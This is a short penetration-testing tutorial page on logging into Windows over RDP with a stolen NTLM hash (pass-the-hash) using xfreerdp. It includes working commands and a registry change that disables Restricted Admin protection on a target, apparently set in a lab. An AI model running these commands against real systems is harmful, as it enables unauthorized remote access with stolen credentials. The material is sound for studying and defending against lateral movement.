# RDP login with NTLM Hash

| RDP login using NTLM Hash is absolutely possible. Just keep in mind that the target RDP port must be reachable from our Parrot attacking machine. So if we have a valid NTLM Hash of any user (Mostly Admin), we can use that hash to login through RDP using xfreerdp: |
| ----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |

```bash
xfreerdp /u:admin /pth:2892d26cdf84d7a70e2eb3b9f05c425e /v:192.168.69.6 /cert-ignore
```

<figure><img src="https://1698500628-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FifilBLhnTZVjmLemJ6ni%2Fuploads%2FLMUQ2LPyprXnvmLBmxVJ%2Fimage.png?alt=media&#x26;token=3e7d2328-9632-471a-80ef-8f64d60f23d9" alt=""><figcaption><p><em>Remote Desktop taken through NTLM Hash</em></p></figcaption></figure>

{% hint style="info" %}
**Enable RDP pass the hash on the Target Machine for example purpose:**&#x20;

New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DisableRestrictedAdmin" -Value "0" -PropertyType DWORD -Force

**Then to pass the hash with RDP to Target\_Machine:**

proxychains xfreerdp /v:172.16.X.194 /u:administrator /pth:f99529e42ee77dc4704c568ba9320a34 +compression +clipboard /dynamic-resolution +toggle-fullscreen /cert-ignore
{% endhint %}